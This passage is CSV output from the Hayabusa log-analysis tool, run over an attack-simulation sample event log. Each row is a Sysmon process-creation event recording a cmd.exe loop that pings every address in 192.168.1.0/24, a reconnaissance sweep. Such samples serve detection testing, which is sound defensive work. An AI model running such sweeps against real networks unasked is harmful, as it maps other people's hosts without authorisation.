Creation,"Command: ping -n 1 -w 100 192.168.1.184 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.185 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.186 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.187 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.188 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.189 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.190 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.191 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.192 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.193 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.194 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.195 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.196 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.197 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.198 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.199 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.200 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.201 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.202 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.203 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.204 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.205 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.206 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.207 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.208 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.209 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.210 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.211 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.212 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.213 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.214 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.215 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.216 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.217 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.218 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.219 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.220 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.221 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.222 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.223 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.224 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.225 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.226 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.227 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.228 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.229 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.230 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.231 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.232 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.233 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.234 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.235 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.236 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.237 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.238 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.239 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 